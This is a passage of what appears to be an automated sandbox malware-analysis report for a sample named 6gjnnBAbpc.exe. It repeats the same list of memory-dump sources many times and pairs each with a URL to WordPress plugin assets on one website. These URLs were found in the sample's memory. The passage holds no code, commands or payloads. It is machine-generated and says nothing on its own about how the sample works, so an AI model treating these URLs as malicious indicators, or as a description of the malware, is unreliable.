                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/js/fm-public.js?ver=1.0.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/css/frontend.min.css?ver=3.3.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/preloaded-elements-handlers.min.js?
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/webpack-pro.runtime.min.js?ver=3.3.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/lib/sticky/jquery.sticky.min.js?ver=3.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.8
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 